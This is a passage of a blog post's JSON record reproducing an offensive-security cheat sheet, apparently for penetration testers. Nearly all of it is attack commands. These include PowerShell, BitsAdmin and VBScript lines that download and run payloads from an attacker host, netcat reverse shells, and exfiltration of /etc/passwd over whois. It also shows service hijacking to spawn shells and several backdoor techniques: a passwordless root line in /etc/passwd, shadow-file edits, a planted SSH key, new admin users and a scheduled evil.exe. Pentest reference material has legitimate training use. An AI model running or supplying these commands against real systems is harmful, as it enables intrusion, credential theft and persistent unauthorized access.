href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-powershell\"><\/a>HTTP: Powershell<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>powershell -Command \"&amp; {(New-Object System.Net.WebClient).DownloadFile('http:\/\/$ATTACKER\/nc.exe','nc.exe'); cmd \/c nc.exe $ATTACKER 4444 -e cmd.exe\" }\npowershell -Command \"&amp; {(New-Object System.Net.WebClient).DownloadFile('http:\/\/$ATTACKER\/nc.exe','nc.exe'); Start-Process nc.exe -NoNewWindow -Argumentlist '$ATTACKER 4444 -e cmd.exe'\" }\npowershell -Command \"(New-Object System.Net.WebClient).DownloadFile('http:\/\/$ATTACKER\/nc.exe','nc.exe')\"; Start-Process nc.exe -NoNewWindow -Argumentlist '$ATTACKER 4444 -e cmd.exe'\"\npowershell (New-Object System.Net.WebClient).DownloadFile('http:\/\/$ATTACKER\/file.exe','file.exe');(New-Object -com Shell.Application).ShellExecute('file.exe');\n<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-vbscript\"><\/a>HTTP: VBScript<\/h4>\n\n\n\n<p>Copy and paste contents of&nbsp;<a href=\"https:\/\/github.com\/mantvydasb\/Offensive-Security-Cheatsheets\/blob\/master\/wget-cscript\">wget.vbs<\/a>&nbsp;into a Windows Shell and then:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cscript wget.vbs http:\/\/$ATTACKER\/file.exe localfile.exe\n<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-linux\"><\/a>HTTP: Linux<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">wget http:\/\/$ATTACKER\/file\ncurl http:\/\/$ATTACKER\/file -O\nscp ~\/file\/file.bin user@$TARGET:tmp\/backdoor.py<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#netcat\"><\/a>NetCat<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Attacker\nnc -l -p 4444 &lt; \/tool\/file.exe\n\n# Victim\nnc $ATTACKER 4444 &gt; file.exe<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-windows-debugexe-method\"><\/a>HTTP: Windows &#8220;debug.exe&#8221; Method<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># 1. In Linux, convert binary to hex ascii:\nwine \/usr\/share\/windows-binaries\/exe2bat.exe \/root\/tools\/netcat\/nc.exe nc.txt\n# 2. Paste nc.txt into Windows Shell.<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-windows-bitsadmin\"><\/a>HTTP: Windows BitsAdmin<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">cmd.exe \/c \"bitsadmin \/transfer myjob \/download \/priority high http:\/\/$ATTACKER\/payload.exe %tmp%\\payload.exe&amp;start %tmp%\\payload.exe<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#whois-data-exfiltration\"><\/a>Whois Data Exfiltration<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># attacker\nnc -l -v -p 43 | sed \"s\/ \/\/g\" | base64 -d\n# victim\nwhois -h $attackerIP -p 43 `cat \/etc\/passwd | base64`<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#bash-ping-sweeper\"><\/a>Bash Ping Sweeper<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">#!\/bin\/bash\nfor lastOctet in {1..254}; do \n    ping -c 1 10.0.0.$lastOctet | grep \"bytes from\" | cut -d \" \" -f 4 | cut -d \":\" -f 1 &amp;\ndone<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#brute-forcing-xored-string-with-1-byte-key-in-python\"><\/a>Brute-forcing XOR&#8217;ed string with 1 byte key in Python<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">encrypted = \"encrypted-string-here\"\nfor i in range(0,255):\n    print(\"\".join([chr(ord(e) ^ i) for e in encrypted]))<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#generating-bad-character-strings\"><\/a>Generating Bad Character Strings<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Python\n'\\\\'.join([ \"x{:02x}\".format(i) for i in range(1,256) ])<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\"># Bash\nfor i in {1..255}; do printf \"\\\\\\x%02x\" $i; done; echo -e \"\\r\"<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#converting-python-to-windows-executable-py---exe\"><\/a>Converting Python to Windows Executable (.py -&gt; .exe)<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">python pyinstaller.py --onefile convert-to-exe.py<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#port-scanning-with-netcat\"><\/a>Port Scanning with NetCat<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">nc -nvv -w 1 -z host 1000-2000\nnc -nv -u -z -w 1 host 160-162<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#exploiting-vulnerable-windows-services-weak-service-permissions\"><\/a>Exploiting Vulnerable Windows Services: Weak Service Permissions<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code># Look for SERVICE_ALL_ACCESS in the output\naccesschk.exe \/accepteula -uwcqv \"Authenticated Users\" *\n\nsc config [service_name] binpath= \"C:\\nc.exe 10.11.0.245 443 -e C:\\WINDOWS\\System32\\cmd.exe\" obj= \"LocalSystem\" password= \"\"\nsc qc [service_name] (to verify!)\nsc start [service_name]\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#creating-persistence\"><\/a>Creating Persistence<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>sc create spotlessSrv binpath= \"C:\\nc.exe 10.11.0.245 443 -e C:\\WINDOWS\\System32\\cmd.exe\" obj= \"LocalSystem\" password= \"\"\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#port-forwarding--ssh-tunneling\"><\/a>Port Forwarding \/ SSH Tunneling<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#ssh-local-port-forwarding\"><\/a>SSH: Local Port Forwarding<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Listen on local port 8080 and forward incoming traffic to REMOT_HOST:PORT via SSH_SERVER\n# Scenario: access a host that's being blocked by a firewall via SSH_SERVER;\nssh -L 127.0.0.1:8080:REMOTE_HOST:PORT user@SSH_SERVER<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#ssh-dynamic-port-forwarding\"><\/a>SSH: Dynamic Port Forwarding<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Listen on local port 8080. Incoming traffic to 127.0.0.1:8080 forwards it to final destination via SSH_SERVER\n# Scenario: proxy your web traffic through SSH tunnel OR access hosts on internal network via a compromised DMZ box;\nssh -D 127.0.0.1:8080 user@SSH_SERVER<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#ssh-remote-port-forwarding\"><\/a>SSH: Remote Port Forwarding<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Open port 5555 on SSH_SERVER. Incoming traffic to SSH_SERVER:5555 is tunneled to LOCALHOST:3389\n# Scenario: expose RDP on non-routable network;\nssh -R 5555:LOCAL_HOST:3389 user@SSH_SERVER\nplink -R ATTACKER:ATTACKER_PORT:127.0.01:80 -l root -pw pw ATTACKER_IP<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#proxy-tunnel\"><\/a>Proxy Tunnel<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Open a local port 127.0.0.1:5555. Incoming traffic to 5555 is proxied to DESTINATION_HOST through PROXY_HOST:3128\n# Scenario: a remote host has SSH running, but it's only bound to 127.0.0.1, but you want to reach it;\nproxytunnel -p PROXY_HOST:3128 -d DESTINATION_HOST:22 -a 5555\nssh user@127.0.0.1 -p 5555<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-tunnel-ssh-over-http\"><\/a>HTTP Tunnel: SSH Over HTTP<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Server - open port 80. Redirect all incoming traffic to localhost:80 to localhost:22\nhts -F localhost:22 80\n\n# Client - open port 8080. Redirect all incoming traffic to localhost:8080 to 192.168.1.15:80\nhtc -F 8080 192.168.1.15:80\n\n# Client - connect to localhost:8080 -&gt; get tunneled to 192.168.1.15:80 -&gt; get redirected to 192.168.1.15:22\nssh localhost -p 8080<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#runas--start-process-as\"><\/a>RunAs \/ Start Process As<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#powershell\"><\/a>PowerShell<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Requires PSRemoting\n$username = 'Administrator';$password = '1234test';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;Invoke-Command -Credential $credential -ComputerName COMPUTER_NAME -Command { whoami }\n\n# without PSRemoting\ncmd&gt; powershell Start-Process cmd.exe -Credential (New-Object System.Management.Automation.PSCredential 'username', (ConvertTo-SecureString 'password' -AsPlainText -Force))\n\n# without PS Remoting, with arguments\ncmd&gt; powershell -command \"start-process cmd.exe -argumentlist '\/c calc' -Credential (New-Object System.Management.Automation.PSCredential 'username',(ConvertTo-SecureString 'password' -AsPlainText -Force))\"<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#cmd\"><\/a>CMD<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Requires interactive console\nrunas \/user:userName cmd.exe<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#psexec\"><\/a>PsExec<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">psexec -accepteula -u user -p password cmd \/c c:\\temp\\nc.exe 10.11.0.245 80 -e cmd.exe<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#pth-winexe\"><\/a>Pth-WinExe<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">pth-winexe -U user%pass --runas=user%pass \/\/10.1.1.1 cmd.exe<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#recursively-find-hidden-files-windows\"><\/a>Recursively Find Hidden Files: Windows<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">dir \/A:H \/s \"c:\\program files\"<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#general-file-search\"><\/a>General File Search<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Query the local db for a quick file find. Run updatedb before executing locate.\nlocate passwd \n\n# Show which file would be executed in the current environment, depending on $PATH environment variable;\nwhich nc wget curl php perl python netcat tftp telnet ftp\n\n# Search for *.conf (case-insensitive) files recursively starting with \/etc;\nfind \/etc -iname *.conf<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#post-exploitation--maintaining-access\"><\/a>Post-Exploitation &amp; Maintaining Access<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#browsing-registry-hives\"><\/a>Browsing Registry Hives<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">hivesh \/registry\/file<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#decrypting-vnc-password\"><\/a>Decrypting VNC Password<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">wine vncpwdump.exe -k key<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#creating-user-and-adding-to-local-administrators\"><\/a>Creating User and Adding to Local Administrators<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">net user spotless spotless \/add &amp; net localgroup Administrators spotless \/add<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#creating-ssh-authorized-keys\"><\/a>Creating SSH Authorized Keys<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">mkdir \/root\/.ssh 2&gt;\/dev\/null; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChKCUsFVWj1Nz8SiM01Zw\/BOWcMNs2Zwz3MdT7leLU9\/Un4mZ7vjco0ctsyh2swjphWr5WZG28BN90+tkyj3su23UzrlgEu3SaOjVgxhkx\/Pnbvuua9Qs9gWbWyRxexaC1eDb0pKXHH2Msx+GlyjfDOngq8tR6tkU8u1S4lXKLejaptiz0q6P0CcR6hD42IYkqyuWTNrFdSGLtiPCBDZMZ\/5g1cJsyR59n54IpV0b2muE3F7+NPQmLx57IxoPjYPNUbC6RPh\/Saf7o\/552iOcmVCdLQDR\/9I+jdZIgrOpstqSiJooU9+JImlUtAkFxZ9SHvtRbFt47iH7Sh7LiefP5 root@kali' &gt;&gt; \/root\/.ssh\/authorized_keys<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#creating-backdoor-user-wo-password\"><\/a>Creating Backdoor User w\/o Password<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">echo 'spotless::0:0:root:\/root:\/bin\/bash' &gt;&gt; \/etc\/passwd\n\n# Rarely needed, but if you need to add a password to the previously created user by using useradd and passwd is not working. Pwd is \"kali\"\nsed 's\/!\/\\$6$o1\\.HFMVM$a3hY6OPT\\\/DiQYy4koI6Z3\\\/sLiltsOcFoS5yCKhBBqQLH5K1QlHKL8\\\/6wJI6uF\\\/Q7mniOdq92v6yjzlVlXlxkT\\.\/' \/etc\/shadow &gt; \/etc\/s2; cat \/etc\/s2 &gt; \/etc\/shadow; rm \/etc\/s2<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#creating-another-root-user\"><\/a>Creating Another root User<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">useradd -u0 -g0 -o -s \/bin\/bash -p `openssl passwd yourpass` rootuser<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#generating-openssl-password\"><\/a>Generating OpenSSL Password<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">openssl passwd -1 password \n# output $1$YKbEkrkZ$7Iy\/M3exliD\/yJfJVeTn5.<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#persistent-back-doors\"><\/a>Persistent Back Doors<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code># Launch evil.exe every 10 minutes\nschtasks \/create \/sc minute \/mo 10 \/tn \"TaskName\" \/tr C:\\Windows\\system32\\evil.exe\n<\/code><\/pre>\n\n\n\n<p>This was inspired by and forked\/adapted\/updated from&nbsp;<a href=\"https:\/\/github.com\/dostoevskylabs\/dostoevsky-pentest-notes\">Dostoevsky&#8217;s Pentest Notes<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Reconnaissance \/ Enumeration Extracting Live IPs from Nmap Scan nmap 10.1.1.1 &#8211;open -oG scan-results; cat scan-results | grep &#8220;\/open&#8221; | cut -d &#8221; &#8221; -f 2 &gt; exposed-services-ips Simple Port Knocking for x in 7000 8000 9000; do nmap -Pn&hellip; <a href=\"https:\/\/whatifsecu.tech\/?p=65\" class=\"more-link\">Continue Reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-65","post","type-post","status-publish","format-standard","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=\/wp\/v2\/posts\/65","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=65"}],"version-history":[{"count":3,"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=\/wp\/v2\/posts\/65\/revisions"}],"predecessor-version":[{"id":133,"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=\/wp\/v2\/posts\/65\/revisions\/133"}],"wp:attachment":[{"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=65"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=65"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/whatifsecu.tech\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=65"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}